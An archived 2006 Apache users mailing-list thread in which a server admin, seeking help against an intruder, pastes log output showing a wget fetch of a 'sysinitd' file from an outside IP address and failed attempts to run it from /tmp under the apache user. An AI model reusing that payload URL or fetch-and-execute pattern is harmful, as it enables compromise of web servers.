Re: [users@httpd] how to prevent an executing from /tmp

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

Immidiatley after restart someone donwloads to /tmp file sysinitrd, how do I know wich virtualhost do this? 


[Sat Jun 03 13:30:25 2006] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Sat Jun 03 13:30:25 2006] [notice] LDAP: SSL support unavailable
[Sat Jun 03 13:30:25 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec) [Sat Jun 03 13:30:26 2006] [notice] Digest: generating secret for digest authentication ... 
[Sat Jun 03 13:30:26 2006] [notice] Digest: done
[Sat Jun 03 13:30:26 2006] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Sat Jun 03 13:30:26 2006] [notice] LDAP: SSL support unavailable
[Sat Jun 03 13:30:26 2006] [notice] mod_python: Creating 32 session mutexes based on 512 max processes and 0 max threads. [Sat Jun 03 13:30:27 2006] [notice] Apache/2.0.51 (Fedora) mod_perl/1.99_12 Perl/v5.8.3 DAV/2 PHP/4.3.11 mod_python/3.1.3 Python/2.3.3 mod_ssl/2.0.51 OpenSSL/0.9.7a configu 
red -- resuming normal operations
--13:30:39--  http://212.78.204.20/turbo3000/sysinitd
          => `sysinitd'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 343.06 KB/s 

13:30:39 (343.06 KB/s) - `sysinitd' saved [31,973/31,973]

sh: line 1: ./sysinitd: Permission denied
--13:30:53--  http://212.78.204.20/turbo3000/sysinitd
          => `sysinitd.1'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 278.19 KB/s 

13:30:53 (278.19 KB/s) - `sysinitd.1' saved [31,973/31,973]

sh: line 1: ./sysinitd: Permission denied
And I often find a processes with name '-bash' and uid 'apache' - how to disallow this? 


I remounted /tmp and /home with noexec,nosuid.


Thanks,
G.
----- Original Message ----- From: "JP" <jp@xxxxxxxxxx> 
To: <users@xxxxxxxxxxxxxxxx>
Sent: Friday, June 02, 2006 5:23 PM
Subject: RE: [users@httpd] how to prevent an executing from /tmp




Someone often uploads files to /tmp and then executing in on the server
with
webserver user priveleges. How to prevent it?



How about changing the umask of the webuser?

JP


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
  "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx





---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
  "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux